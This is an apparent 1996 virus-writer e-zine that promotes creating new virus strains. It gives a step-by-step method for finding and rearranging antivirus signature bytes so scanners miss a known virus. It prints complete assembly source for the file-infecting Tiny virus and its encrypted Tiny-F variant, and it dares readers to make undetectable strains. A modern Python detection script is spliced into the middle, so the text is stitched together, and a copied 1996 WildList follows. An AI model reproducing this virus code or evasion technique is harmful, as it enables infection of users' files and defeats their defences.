Virus Bits & Bytes
Issue 1
June 1 1996
------------------

INDEX
-----
000 - You're reading it!
001 - Why am I doing this?
002 - Modifying virii to get past scan. (Taken from 40Hex)
003 - This issue's Virus Challenge.
004 - Who was that asshole? And AntiEXE Virus!
005 - Application form for VBB
006 - The Color Macro Virus
007 - EXTRA! The Doom II Virus!
008 - Virus News! A List of Virii in the Wild

CREDITS:
Dark Night (moi!) - Editor, co-editor, virus supply, news, distribution.... (well you get the point)

Why Am I Doing This?

Hi! Have you ever wondered why the hell somebody would sit down just to make a mag for other people to read and to enjoy (maybe learn :-)) Well, I'm not profiting off of this work, but at least I'm helping make the world of virii programming different and more interesting! The goal of this mag is to supply you with source, played out virus code and hints on how to program (modify, etc) virii. That's why I'm doing this. To bring life into the virus community, to see some action.

Help Wanted!!!!

Ok, I'll admit it right now. This mag isn't going to survive long if I don't get anybody to help me and to collect some news. I don't have the time nor do I feel like writing this mag on my own. So if you want to help send some mail to 101546.2222@compuserve.com.

Greets!

Hi to all you virus programmers out there! Also greets to Godarky who owns a nice little page of virus source code on the Web. Also special greets to VLAD whose Win95 virus "Bizatch" I feature in this mag.

DN

- HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT -
OR
HOW TO CREATE NEW VIRUS STRAINS

The problem with most viruses is that this dickhead who lives in California named John McAfee gets his greedy hands on them and turns them into big bucks -- for him. John boy is the reason there are over 500 viruses out there, and I wouldn't doubt if he weren't responsible for writing at least ten of them.

So the best thing to do to some McAfee dependent sucker, or lame board is this.
Say you have a copy of a played out virus, let's say an older one like Armstand or Jerusalem. Almost every virus scanner can detect these viruses because they've been around so long. Now here's a quick way to modify viruses so the scanners won't catch them, in turn making them new strains.

The tools you need are --

    Norton Utilities (or a good hex-editor)
    Debug and/or Turbo Debugger by Borland

Now here's what you do.

Step A
------
Make a target file like this with Debug.

Copy the below file with your editor to a file called SAMPLE.USR

-------------------------------------------------------------------------------
n sample.com
a
int 20

rcx
2
w
q
------------------------------------------------------------------------------

Then use Debug to make the file SAMPLE.COM by executing this command --

    DEBUG < SAMPLE.USR

This will make a two-byte file called SAMPLE.COM

STEP B
------
Infect the file with the virus. If this is a boot sector virus you're on your own. Do whatever you have to to infect the two byte file.

Make a copy of the file and keep it for safe keeping.

STEP C
------
Load up DISKEDIT, which comes with Norton 6.0 (I'm not sure if it's in the lower versions). PCTOOLS Hex Editor will work too but it takes more work.

Now have DISKEDIT Hex-edit the infected file.

Now figure out where the middle of the file is. Next put block on and go to the end of the file. At the end of the file go to the edit screen and select fill. Fill the lower half of the file with nonsense characters, it's good to select 255d (FFh), the blank character.

Now save your changes and go to DOS.

Now use SCAN to scan the file for viruses. If it detects the virus you didn't delete the search string that SCAN is searching for. Get it??? You see, all SCAN does is search files for strings that are related to viruses. For example if SCAN was looking for CASCADE it would look for something like this-

    EB1DAD1273D1FF121F

In every file you specify.
So what we are doing is narrowing down where that string is in the virus that SCAN keeps finding.

So what you have to do is keep deleting parts of the virus with DISKEDIT until you finally narrow down the string.

Keep this in mind, search strings are in the first 150 bytes of the file about 75% of the time.

Ok, let's say you narrowed down the search string and let's say it's -

    B8 92 19 B7 21 CD

It will most likely be longer but this is an example.

Now back to DEBUG - Do the following--

    DEBUG
    E 0100 b8 92 19 b7 21 cd      -- this is the string you found

Then type --

    U

This will give you an unassembled look at what the id-string is. In this example it was

    mov ax,1992h
    mov bx,21h
    int 21h

Now this is what you have to do, and keep in mind the following ---

THE FOLLOWING TAKES A SOMEWHAT KNOWING OF ASSEMBLER AND HOW IT WORKS!!!!!!

Use Turbo Debugger to find the string, you can use DEBUG but I don't know how to do this from debug.

Ok, say you got the string on the screen --

    mov ax,1992h
    mov bh,21h
    int 21h

Write down the locations in the file where these strings are. Ex 0100h etc..

Now rearrange the AX mov with the BX mov like this ---

    mov bh,21h
    mov ax,1992h
    int 21h

You see? You didn't change the way the code functions (THAT'S IF YOU KNOW WHAT YOU'RE DOING!) but you changed the code's id-string for SCAN.

Now since Turbo Debugger doesn't let you save the changes you must do it via Debug.

    DEBUG virus.com
    a 0122                        - This is the address of the string

Now enter the assembler instructions --

    mov bh,21
    mov ax,1992h
    int 21h
    w
    q

Save it and SCAN it, if SCAN doesn't catch it Congrats. If it does --- back to the lab. Oh well, you get the point.

One warning, this only works with un-encrypting viruses, or on the encryption mechanism of encrypting files (which will most likely be Scanned).

With that in mind, have fun.

HR

Virus Challenge
---------------
This virus challenge goes right up to what I have included into my mag at the beginning.
I'm going to show you 2 copies of the Tiny Virus (tiny and tiny-f). You can look at the changes made and where the virus was improved. So my challenge to you is to program a new strain of this virus so that scan doesn't catch it**.

** You can send the SOURCE CODE to me if you want me to take a look at it. Sorry, I won't take com's or exe's! If you send me one they will be deleted right away. Thanx!

Cut out here for Tiny
----------------------------------------------------------------------------
; Name: Tiny
; Aliases: 163 COM Virus, Tiny 163 Virus, Kennedy-163
; V Status: Rare
; Discovery: June, 1990
; Symptoms: COMMAND.COM & .COM file growth
; Origin: Denmark
; Eff Length: 163 Bytes
; Type Code: PNCK - Parasitic Non-Resident .COM Infector
; Detection Method: ViruScan V64+, VirexPC, F-Prot 1.12+, NAV, IBM Scan 2.00+
; Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected files
; General Comments:
;       The 163 COM Virus, or Tiny Virus, was isolated by Fridrik Skulason
;       of Iceland in June 1990. This virus is a non-resident generic
;       .COM file infector, and it will infect COMMAND.COM.
;
;       The first time a file infected with the 163 COM Virus is executed,
;       the virus will attempt to infect the first .COM file in the
;       current directory. On bootable diskettes, this file will normally
;       be COMMAND.COM. After the first .COM file is infected, each time
;       an infected program is executed another .COM file will attempt to
;       be infected. Files are infected only if their original length is
;       greater than approximately 1K bytes.
;
;       Infected .COM files will increase in length by 163 bytes, and have
;       date/time stamps in the directory changed to the date/time the
;       infection occurred. Infected files will also always end with this
;       hex string: '2A2E434F4D00'.
;
;       This virus currently does nothing but replicate, and is the
;       smallest MS-DOS virus known as of its isolation date.
;
;       The Tiny Virus may or may not be related to the Tiny Family.
;       ^like she'd know the difference!
; ;----------------------------------------------------------------------------- PAGE 59,132 data_2e equ 1ABh ;start of virus seg_a segment byte public ; assume cs:seg_a, ds:seg_a ;assume cs, ds - code org 100h ;orgin of all COM files s proc far start: jmp loc_1 ;jump to virus ;this is a replacement for an infected file db 0CDh, 20h, 7, 8, 9 ;int 20h ;pop es loc_1: call sub_1 ; s endp sub_1 proc near ; pop si ;locate all virus code via sub si,10Bh ;si, cause all offsets will mov bp,data_1[si] ;change when virus infects add bp,103h ;a COM file lea dx,[si+1A2h] ;offset of '*.COM',0 - via SI xor cx,cx ;clear cx - find only normal ;attributes mov ah,4Eh ;find first file loc_2: int 21h ; jc loc_6 ;no files found? then quit mov dx,9Eh ;offset of filename found mov ax,3D02h ;open file for read/write access int 21h ; mov bx,ax ;save handle into bx mov ah,3Fh ;read from file lea dx,[si+1A8h] ;offset of save buffer mov di,dx ; mov cx,3 ;read three bytes int 21h ; cmp byte ptr [di],0E9h ;compare buffer to virus id ;string je loc_4 ; loc_3: mov ah,4Fh ;find the next file jmp short loc_2 ;and test it loc_4: mov dx,[di+1] ;lsh of offset mov data_1[si],dx ; xor cx,cx ;msh of offset mov ax,4200h ;set the file pointer int 21h ; mov dx,di ;buffer to save read mov cx,2 ;read two bytes mov ah,3Fh ;read from file int 21h ; cmp word ptr [di],807h ;compare buffer to virus id je loc_3 ;same? then find another file ;heres where we infect a file xor dx,dx ;set file pointer xor cx,cx ;ditto mov ax,4202h ;set file pointer int 21h ; cmp dx,0 ;returns msh jne loc_3 ;not the same? find another file cmp ah,0FEh ;lsh = 254??? jae loc_3 ;if more or equal find another file mov ds:data_2e[si],ax ;point to data mov ah,40h ;write to file lea dx,[si+105h] ;segment:offset of write buffer mov cx,0A3h ;write 163 bytes int 21h ; jc loc_5 ;error? 
then quit mov ax,4200h ;set file pointer xor cx,cx ;to the top of the file mov dx,1 ; int 21h ; mov ah,40h ;write to file lea dx,[si+1ABh] ;offset of jump to virus code mov cx,2 ;two bytes int 21h ; ;now close the file loc_5: mov ah,3Eh ;close file int 21h ; loc_6: jmp bp ;jump to original file data_1 dw 0 ; db '*.COM',0 ;wild card search string sub_1 endp seg_a ends end start ---------------------------------------------------------------------------- The Tiny-F Strain made by DA Cut Here! ---------------------------------------------------------------------------- tinyv SEGMENT BYTE PUBLIC 'code' ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv ORG 100h DOS EQU 21h start: JMP pgstart exlbl: db 0CDh, 20h, 7, 8, 9 pgstart:CALL tinyvir tinyvir: POP SI ; get SI for storage SUB SI,offset tinyvir ; reset SI to virus start MOV BP,[SI+blnkdat] ; store SI in BP for return ADD BP, OFFSET exlbl CALL endecrpt JMP SHORT realprog ;----------------------------------------------------------------------------- ; nonencrypted subroutines start here ;----------------------------------------------------------------------------- ; PCM's encryption was stupid, mine is better - Dark Angel endecrpt: ; Only need to save necessary registers - Dark Angel PUSH AX ; store registers PUSH BX PUSH CX PUSH SI ; New, better, more compact encryption engine MOV BX, [SI+EN_VAL] ADD SI, offset realprog MOV CX, endenc - realprog SHR CX, 1 JNC start_encryption DEC SI start_encryption: MOV DI, SI encloop: LODSW ; DS:[SI] -> AX XOR AX, BX STOSW LOOP encloop POP SI ; restore registers POP CX POP BX POP AX RET ;-----end of encryption routine nfect: CALL endecrpt MOV [SI+offset endprog+3],AX; point to data MOV AH,40H ; write instruction LEA DX,[SI+0105H] ; write buffer loc | MOV CX,offset endprog-105h ; (size of virus) --\|/-- INT DOS ; do it! 
PUSHF CALL endecrpt POPF JC outa1 ; error, bug out RET outa1: JMP exit ;----------------------------------------------------------------------------- ; Unencrypted routines end here ;----------------------------------------------------------------------------- realprog: CLD ; forward direction for string ops ; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel ; Instead, set DTA to SI+ENDPROG+131h MOV AH, 1Ah ; Set DTA LEA DX, [SI+ENDPROG+131h] ; to DS:DX INT 21h LEA DX,[SI+fspec] ; get filespec (*.COM) XOR CX, CX ; || (clear regs) MOV AH,4EH ; || (find files) mainloop: ; \||/ INT DOS ; ----\/---- JC hiccup ; no more files found, terminate virus ; Next part had to be changed to account for new DTA address - Dark Angel LEA DX, [SI+ENDPROG+131h+30]; set file name pointer ; (offset 30 is DTA filename start) MOV AX,3D02H ; open file INT DOS ; do it! MOV BX,AX ; move file handle to BX MOV AH,3FH ; read file LEA DX,[SI+endprog] ; load end of program (as buffer pntr) MOV DI,DX ; set Dest Index to area for buffer MOV CX,0003H ; read 3 bytes INT DOS ; do it! CMP BYTE PTR [DI],0E9H ; check for JMP at start JE infect ; If begins w/JMP, Infect nextfile: MOV AH,4FH ; set int 21 to find next file JMP mainloop ; next file, do it! hiccup: JMP exit infect: MOV AX,5700h ; get date function INT DOS ; do it! PUSH DX ; store date + time PUSH CX MOV DX,[DI+01H] ; set # of bytes to move MOV [SI+blnkdat],DX ; " " " " " " ; Tighter Code here - Dark Angel XOR CX,CX ; " " " " " " (0 here) MOV AX,4200H ; move file INT DOS ; do it! MOV DX,DI ; set dest index to area for buffer MOV CX,0002H ; two bytes MOV AH,3FH ; read file INT DOS ; do it! CMP WORD PTR [DI],0807H ; check for infection JE nextfile ; next file if infected getaval: ; encryption routine starts here ; My modifications here - Dark Angel MOV AH, 2Ch ; DOS get TIME function INT DOS ; do it! OR DX, DX ; Is it 0? 
JE getaval ; yeah, try again MOV word ptr [si+offset en_val], DX ; Store it ; Tighter code here - Dark Angel XOR DX,DX ; clear regs XOR CX,CX ; " " MOV AX,4202H ; move file pointer INT DOS ; do it! OR DX,DX ; new pointer location 0? JNE nextfile ; if no then next file CMP AH,0FEH ; new pointer loc too high? JNC nextfile ; yes, try again CALL nfect MOV AX,4200H ; move pointer XOR CX, CX ; clear reg MOV DX,OFFSET 00001 ; where to set pointer INT DOS ; do it! MOV AH,40H ; write to file LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER MOV CX,0002H ; two bytes (the JMP) INT DOS ; do it! MOV AX,5701h ; store date POP CX ; restore time POP DX ; restore date INT DOS ; do it! exit: MOV AH,3EH ; close file INT DOS ; do it! ; Return DTA to old position - Dark Angel MOV AH, 1Ah ; Set DTA MOV DX, 80h ; to PSP DTA INT 21h JMP BP ;----------------------------------------------------------------------------- ; encrypted data goes here ;----------------------------------------------------------------------------- fspec LABEL WORD DB '*.COM',0 nondata DB 'Tiny-F version 1.1' ; Program identification DB 'Dark Angel' ; author identification DB 'Released 10-19-91' ; release date endenc LABEL BYTE ; end of encryption zone ;----------------------------------------------------------------------------- ; nonencrypted data goes anywhere after here ;----------------------------------------------------------------------------- blnkdat LABEL WORD DW 0000H ; Only en_val is needed now because of new encryption mechanism en_val DW 0h endprog LABEL WORD tinyv ENDS END start ---------------------------------------------------------------------------- This is the end! Who was that Asshole? --------------------- Well, the story is this. I was at school sitting in the Computer Lab, hacking the network :-) when suddenly I noticed this directory called virus on the harddrive. This made me curious. I checked, and inside the directory there was an AV program called Dr. Web. 
I ran the Program and it detected the AntiEXE virus in memory and in the Boot Sector. So I copied the prog. thinking this might be useful. Then at home I scanned my computer and I also found the AntiEXE infection. But to my surprise the virus had just trashed a few exe files on my HD. That was the second that I realised that I must have gotten this virus off of the school computer from some asshole who didn't know what he was doing or did it on purpose. By now I have figured out the guy's name and E-Mail address. I will gladly send it to you if you want.

For this issue I have included the COM of the virus (uuencoded*) and a description of it. I will support anybody who wants to make a new strain of this virus, etc. But remember, don't make the virus do any more damage than it does already, because I usually don't support malicious coding. Well, here it is:

The AntiEXE Virus Description (info stolen from Stiller Research):

AntiEXE
Aliases: D3
Synopsis: Destructive, resident DOS boot sector and partition sector virus
Damage: Inadvertent damage to diskette files and deliberate damage to .EXE files
Symptoms: Damaged files, less total memory and PC hangs
Details: AntiEXE deliberately damages .EXE files by changing the first byte of the file. Like Stoned, it will cause damage to any infected floppy that contains more than just a few files. This virus is memory resident and will infect any floppy accessed. AntiEXE remaps the disk interrupt (Int 13h) to avoid resident monitoring programs but has no stealth capabilities.

* UUencoding and decoding program included with this issue!
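Returning to the Tiny description earlier in this issue: its stated symptoms (163 bytes of growth, the trailing hex string '2A2E434F4D00') and the self-check visible in the listing (a leading E9 jump whose operand is the file offset of the word 0807h) are enough for a static check of .COM files. This is an added example, not part of the original issue; the function names are hypothetical and the sample buffers are constructed, inert filler.

```python
"""Static check for Tiny (163 COM) infection indicators.

Added example. Every indicator below is taken from the description and
listing printed in this issue; the names are hypothetical.
"""
import struct
import sys
from pathlib import Path

VIRUS_LEN = 163                        # "Eff Length: 163 Bytes"
TAIL = bytes.fromhex("2A2E434F4D00")   # '*.COM\0', hex string quoted in the description
MARKER = b"\x07\x08"                   # word 0807h the listing compares against
JMP_NEAR = 0xE9                        # first byte the listing requires in a host file


def tiny_indicators(data: bytes) -> dict:
    """Return each indicator as a boolean so an analyst sees what matched."""
    found = {
        "starts_with_jmp": len(data) >= 3 and data[0] == JMP_NEAR,
        "marker_at_jump_operand": False,
        "appended_body_is_163_bytes": False,
        "ends_with_search_string": data.endswith(TAIL),
    }
    if found["starts_with_jmp"]:
        # The listing seeks to the file offset given by the jump operand and
        # reads one word there; in an infected file that word is 0807h.
        operand = struct.unpack_from("<H", data, 1)[0]
        found["marker_at_jump_operand"] = data[operand:operand + 2] == MARKER
        # The operand is the pre-infection length, so operand + 163 equals
        # the current length when the body was appended exactly once.
        found["appended_body_is_163_bytes"] = operand + VIRUS_LEN == len(data)
    return found


def classify(data: bytes) -> str:
    """'match' = all indicators, 'partial' = worth a manual look."""
    found = tiny_indicators(data)
    if all(found.values()):
        return "match"
    structural = (found["marker_at_jump_operand"]
                  and found["appended_body_is_163_bytes"])
    if structural or found["ends_with_search_string"]:
        return "partial"
    return "no match"


def make_sample(host_len: int, infected: bool, tail: bytes = TAIL) -> bytes:
    """Build a constructed, inert buffer (NOP and zero filler only)."""
    if not infected:
        return bytes([JMP_NEAR, 0x10, 0x00]) + b"\x90" * (host_len - 3)
    host = (bytes([JMP_NEAR]) + struct.pack("<H", host_len)
            + b"\x90" * (host_len - 3))
    body = MARKER + b"\x00" * (VIRUS_LEN - len(MARKER) - len(tail)) + tail
    return host + body


def scan_tree(root: str) -> list:
    """Classify every *.com file under root; return (path, verdict) hits."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() == ".com":
            verdict = classify(path.read_bytes())
            if verdict != "no match":
                hits.append((str(path), verdict))
    return hits


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, verdict in scan_tree(sys.argv[1]):
            print(f"{verdict:8} {path}")
    else:
        samples = {
            "constructed clean": make_sample(1200, infected=False),
            "constructed full indicator set": make_sample(1200, infected=True),
            "constructed, tail string altered": make_sample(
                1200, infected=True, tail=b"*.EXE\x00"),
        }
        for label, buf in samples.items():
            print(f"{classify(buf):8} {label}")
```

A "partial" verdict covers the case where the trailing string has been altered but the jump operand, marker word and 163-byte growth still line up, so the check does not depend on the search string alone.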
SR News: Viruses in the Wild

The following list is maintained by Joe Wells of IBM anti-virus development. (Thank you, Joe!) Several companies including Stiller Research provide the reports that build this list. If you have had a virus incident please send us or one of the other companies listed below a note describing the virus and what product you used to identify it.

============================================================================
PC Viruses in the Wild - March 15, 1996
============================================================================

This is a cooperative listing of viruses reported as being in the wild by 37 virus information professionals. The basis for these reports are virus incidents where a sample was received, and positively identified by the participant. Rumors and unverified reports have been excluded.

This report is cumulative. That is, this is not just a report of which were seen last month. Monthly data is received from most participants, but the new data is added to the old. Participants are expected to let me know when I should remove their name from a virus that they haven't seen in a year and a half or so.
The list should not be considered a list of "the most common viruses", however, since no specific provision is made for a commonness factor. This data indicates only "which" viruses are in the wild, but viruses reported by many (or most) participants are obviously widespread.

The WildList is currently being used as the basis for in-the-wild virus testing of antivirus products by Virus Bulletin and the NCSA (National Computer Security Association). Additionally, a virus collection based upon the WildList is being used in an effort to standardize the naming of common viruses.

The WildList - (c)1993-1996 by Joe Wells - wildlist@vcnet.com

============================================================================

The section below gives the names of participants, along with their geographic region, organization, and antivirus product (if any). The locations with an asterisk (*) note that the reports are regional, all others being multinational or global.

Key Participant          * Region          Organization       Product
============================================================================
Ac  Alan Candy           * New Zealand     Applied Insight    F-Prot Pro
Ad  Allan Dyer           * Hong Kong       Yui Kee Co. Ltd.   F-Prot
Ae  Amir Elbaz             Israel          EliaShim           ViruSafe
Cj  Craig Jackson          USA             Datawatch          VirexPC
Cs  Christian Schmid     * Austria         DataPROT Linz      F-Prot
Dc  Dave Chess             USA             IBM                IBM AntiVirus
Dg  Dmitry Gryaznov        UK              S&S Int'l          Dr. Solomon's
Ek  Eugene Kaspersky     * Russia          KAMI               AVP
Ev  Eduardo Velasquez    * Colombia/Vene.  SOFTEAM Ltda       VirusCOP
Ew  Eddy Willems         * Belgium/Lux.    De Vaderlandsche   None
Fl  Ferenc Leitold       * Hungary         Hunix Ltd.         Virus Buster
Fs  Fridrik Skulason       Iceland         Frisk Int'l        F-Prot
Gm  Gerard Mannig        * France          RECIF              None
Gp  Gabriel Pislaru      * Romania         SoftWin            AVX
Iw  Ian Whalley            UK              Virus Bulletin     None
Jd  Joost de Raeymaeker  * Portugal        RSVP               Dr. Solomon's
Jk  Jimmy Kuo              USA             McAfee             ViruScan
Ks  Klas Scholdstrom     * Sweden          QA Informatik      Dr. Solomon's
Ls  Luca Sambucci        * Italy           I.C.A.R.O.         None
Mh  Mikko Hypponen       * Finland         Data Fellows       F-Prot Pro
Ms  Marek Sell           * Poland          APEXIM             MkS_vir
Oh  Omar Herrera         * Mexico          Escuadron AV       Aguila AV
Pb  Pavel Baudis         * Czech Republic  Alwil Software     Avast!
Pd  Paul Ducklin           UK              Sophos Plc.        Sweep
Ra  Ruben Arias          * Argentina       RALP               Integ Master
Rf  Richard Foley        * Ireland         Reflex Magnetics   TBAV
Rk  Richard Ku           * Taiwan          Trend Micro        PC-cillin
Rr  Roger Riordan          Australia       CYBEC              VET
Rt  Roger Thompson         USA             Thompson Network   Doctor
Rv  Robert Vibert        * Canada          Sensible Security  D. Solomon's
Sc  Shane Coursen          USA             Symantec           NAV
Sg  Sarah Gordon           USA             Command Software   NetProt
Sm  Seiji Murakami       * Japan           Jade Corp          Scan Vakzin
Td  Toralv Dirro         * Germany         U of Hamburg       None
Ws  Wolfgang Stiller       USA             Stiller Research   Integ Master
Yp  Ywain Penberthy      * So Africa       CSIR Virus Lab     VPS
Yr  Yuval Rakavi         * Israel          BRM                Untouchable

============================================================================
The WildList
============================================================================

This main list includes viruses reported by multiple participants, which appear to be non-regional in nature. Technically, this first list is "the" WildList according to my original specification, which required viruses to be verified in the wild by a minimum of two participants. A supplemental list follows that contains viruses reported by single participants.

If a virus listed has minor variants, but no specific variant letter is attached, the virus meant is the .A variant. Viruses marked with a plus sign (+) are new to the main list this month.

 CARO Name of Virus      [ Alias(es)     ] Reported by:
============================================================================
 15_Years................[Espejo, Esto...] AeDcDgEvJkRtScSg
 Accept.3773.............[...............] RaYr
 Aircop.Standard.........[...............] OhRk
+Alfons.1344.............[...............] FsRr
 Anticad.4096.A..........[Plastique 5.12.] JkSg
 Anticad.4096.Mozart.....[Invader........] DgFsJkSg
 AntiCMOS.A..............[Lenart.........] AcAdCjDcDgEvEwFlFsGmIwJdJkKsMhMs
                              (continued)  PdRtRvScSgSmWsYpYr
 AntiCMOS.B..............[LiXi...........] AdMsScSmTdYr
 AntiEXE.A...............[D3, Newbug.....] AcAdCjDcDgEvEwFlFsGmGpIwJkKsMhMs
                              (continued)  PdRfRkRtRvScSgSmTdWsYr
 Arianna.3375............[...............] DcDgLs
 Avispa.D................[...............] AeJkRaRtSc
 BackFormat.A............[Backform.......] DgFlFsJkMhYr
 Baclab..................[NTU.T4, Crawber] RtSc
 Bad_Sectors.3428........[...............] FlGpYr
 Barrotes.1310.A.........[Barrotos.......] DgEvGmJdJkPdScYp
 Boot-437................[...............] AcCjDcDgFlFsGmJkKsMsOhPbPdRkRtSc
                              (continued)  SgSmWsYr
 BootEXE.451.............[BFD, BE-451....] FlFsIwJkMhMsSg
 Bosnia:TPE.1_4..........[TPE_Bos........] JkLs
 Brasil..................[...............] CjJkSc
+Burglar.................[GranGrave.1150.] DgFsJkMh
 Bye.....................[ByeBye.........] DcKsPdTd
 Byway.A.................[Dir2.Byway, Hnd] DcDgEvIwJkScSg
 Byway.B.................[Dir2.Byway, Hnd] DcDgEv
 Cascade.1701.A..........[1701...........] CjCsDgFsGmGpJkKsMhPdRtSgSmWs
 Cascade.1704.A..........[1704...........] CsDgEkFsKsRtScSg
 Cascade.1704.D..........[Unk............] FsJk
 Chance.B................[Lennon.........] DcFsSc
 Changsha.A..............[Centry,.Changes] KsMsRrRt
 Chaos.1241..............[Faust..........] JkRrSgYr
 Chill...................[Chill Touch....] JkRtSc
 Chinese_Fish............[Fish Boot......] CjDgFsJkKsRkRrRtYr
 Civil_Defence.6672......[CDV 3.3........] DcPbSg
 Concept.................[WordMacro......] AcAdCsDgEwIwJdJkKsMhMsPdRfRkRrRv
                              (continued)  ScSgSmTdWsYp
 CPW.1527................[Mediera, Mierda] DgEvJkSc
 Crazy_Boot..............[...............] DcDgEwFlJkMhScSgSmTd
 DA_Boys.................[...............] CjEwJkRtScSgWs
 Dark_Avenger.1800.A.....[Eddie..........] CjDgFsGpIwRrSgWs
 Datalock.920.A..........[V920...........] DgYr
 DelWin.1759.............[Goblin.1759....] DcJkMsPdTd
 Den_Zuko.2.A............[Den Zuk........] DgRtSg
 Diablo_Boot.............[...............] DcEvMhPdRaSc
 Die_Hard................[DH2, Wix.......] DcDgFlFsJkKsMsRkRtScSgTdWsYpYr
 Dir_II.A................[Creeping Death.] CsDgEkFlFsGmGpJkKsOhRrScSgWsYpYr
 Disk_Killer.1_00........[Ogre...........] DgEkKs
 Disk_Washer.............[...............] ScSm
 DR&ET.1710..............[Dret...........] JkMs
 EXE_Bug.A...............[CMOS Killer....] DgFsGmJkKsOhPdRfRtScTdWsYp
 EXE_Bug.C...............[...............] RtYp
 EXE_Bug.Hooker..........[...............] RtYp
 Fairz...................[Khobar.........] JkMhMsRf
 Fat_Avenger.............[...............] DcRrSm
 Feint...................[Int7F-E9.......] DgFsPd
 Fichv.2_1...............[905, CHV 2.1...] DgFsGmJk
 Filler.A................[DiskFiller.....] CjKs
 Finnish.357.............[...............] FsKs
 Finnish_Sprayer.........[Aija...........] FsKsMhSc
 Flame...................[Stamford.......] JkRrScYr
 Flip.2153.A.............[Omicron........] DcDgFsGmJkKsSmYr
 Flip.2343...............[Omicron 2......] DgFsJd
 Form.A..................[Form 18........] AcCjCsDcDgEvEwFlFsGmGpIwJdJkKsLs
                              (continued)  MhPbPdRfRtScSgSmTdWsYpYr
 Form.C..................[...............] CsMs
 Form.D..................[Form May.......] CsDcEvFsGmMsPdRtScYr
 Frankenstein............[Frank, Sblank..] DgJkMs
 Freddy_Krueger..........[Freddy 2.......] FsJkScWsYr
 Frodo.Frodo.A...........[4096,.4K.......] DcDgEwFsGpJkKsRrYr
 Galicia.................[Telecom........] JkMhRtSc
 Ginger.2774.............[Gingerbread....] JkRrSc
 GoldBug.................[...............] DgFlJkMh
 Green_Caterpillar.1575..[Find,1575,1591.] CjDgFlFsGmGpIwJkLsOhRrRtScSmWs
 Helloween.1376.A........[1376...........] DcDgFlIwJkPbRrScWsYr
 Hi.460..................[Hi.............] GpJkMsYr
 Hidenowt................[...............] DgGmJkPdScSm
 HLLC.Even_Beeper.B......[...............] DgMsWs
 HLLO.Novademo...........[Nova...........] FsMs
 J&M.....................[Jimi, Jimmy....]
DcFsIwJkKsMhMsPbPd Jerusalem.1244..........[1244...........] DgLsSg Jerusalem.1808.Standard.[1808, 1813.....] CjCsDcDgFsJkKsRkRtSgSmWsYpYr Jerusalem.Mummy.1364.A..[Mummy 2.1......] DgFsRtYp Jerusalem.Sunday.A......[Sunday.........] JkRkRtSgYp Jerusalem.Zero_Time.Aust[Slow...........] DgJdJkRrRtSm Jos.1000................[Jabb,Jabberwocy] GpMs Joshi.A.................[...............] CjDcDgFsJkKsRkRrRtScSgSmWsYr Jumper.A................[French Boot, 2k] CjDcDgEwFsGmGpPdRtScSgYr Jumper.B................[SillyBop, 2kb..] DgJkKsMhMsSgSm Junkie..................[...............] AcCsDcEwFlFsGmGpIwJkKsLsMhMsPdRf (continued) RrRtScSmTdWsYr Kampana.A...............[AntiTel,Campana] CjDcDgEwFsGmIwJdJkKsMhPbPdRfRtSc (continued) SgSmTd Kaos4.687...............[...............] FsJkMsScSgYp Keypress.1232.A.........[Turku, Twins...] DcDgGpRrRtSgYr Leandro.................[TimeWarp.......] AeDcEvGpIwJkMhPdRtScWs Lemming.2160............[...............] RrSc Liberty.2857.A..........[Mystic, Magic..] DcEvFsRtSmYr Little_Brother.307......[...............] FsJk Little_Red.1465.........[Red Book, Mao..] CjDcDgJkRtScSmTdWsYpYr MacGyver.2803...........[Shoo...........] AdGmJkMsRk Maltese_Amoeba..........[Amoeba.2367....] DgFsGmKsMsRtSgWsYpYr Mange_Tout.1099.........[1099...........] DgGmJkKsMsPbSc Manzon.1449.............[...............] DcEwIwJkMhMsRrTd Markt.1533..............[Werbe, Media...] DgJk MIREA.1788..............[Lyceum.1788....] AeEkJk +MISiS...................[Zharinov,NIKA..] EvYr Mongolian_Boot..........[Mongol.........] DgScSm Music_Bug...............[...............] CjFsJkWs Necros.1164.............[Gnose, Irish3..] DgRf Neuroquila..............[Havoc, Wedding.] DgJkWs Nightfall.4518.B........[N8Fall, Nightfa] DgJkPbTd NJH2LBC.A...............[Korea Boot.....] DgJkYr No_Frills.Dudley........[Oi Dudley......] DgJkRrRt No_Frills.No_Frills.843.[...............] JkRrSc Nomenklatura.A..........[Nomen..........] 
DgJkMh November_17th.800.A.....[Jan1, Int83.800] LsSc November_17th.855.A.....[Int83.855......] DgFsGmJkLsRtSc NPox.963.A..............[Evil Genius....] FsSc NYB.....................[B1.............] AdCjDcDgEkEwFsJkKsLsMhMsPdRtScSg (continued) SmTdWsYpYr One_Half.3544...........[Dis, Free Love.] AdAeCsDcDgEkEvEwFlFsGmGpJkKsLsMh (continued) MsPbRfRkRtScSgTdWsYpYr Ontario.1024............[SBC, 1024......] DcRr +Parity_Boot.A...........[...............] IwTd Parity_Boot.B...........[Generic 1......] CjCsDcDgEvEwFlFsGmGpJdJkKsMhPdRf (continued) RtScSgSmTdYp Pathogen:SMEG.0_1.......[SMEG...........] DgScWs Peter...................[Peter II.......] DcJdJkMhSmYp Ph33R.1332..............[...............] EwJk Phx.965.................[PUX.965........] MsRa Ping_Pong.B.............[Bouncing-Ball, ] DgGmGpYr Predator.2448...........[2448...........] FsJkKsScYr Print_Screen_Boot.A.....[India, PrnSn...] DgYr QRry....................[Query, Essex...] DcEvJkSc +Quandary................[Parity_Boot.Enc] DgTd Quicksilver.1376........[Quicky, V.1376.] DgFlGmJkPdScTdYr Quox.A..................[Stealth 2......] DcFlFsJkRtScSgSm Ripper..................[Jack Ripper....] AcAdCjCsDcDgEwFlFsGmGpIwJkKsMhMs (continued) PbPdRfRkRtRvScSgSmTdWsYp Russian_Flag............[Slydell, Ekater] DgJkScYpYr Sampo...................[Turbo, Wllop...] AcAdCjDcDgEwFsGmIwJkKsMhMsPbPdRt (continued) ScSgSmWsYp Sarampo.1371............[...............] DgJdJk Sat_Bug.Natas.4744......[Satan..........] AdDcDgEvEwFlFsJdJkKsMhMsOhPbPdRk (continued) RtScSgSmTdYp Sat_Bug.Sat_Bug.........[Satan Bug......] EvJkScYr Satria..................[July 4th.......] JkTd Sayha...................[...............] JkScYr Screaming_Fist.II.696...[Fist 2, Scream.] CjDgJkRtSg 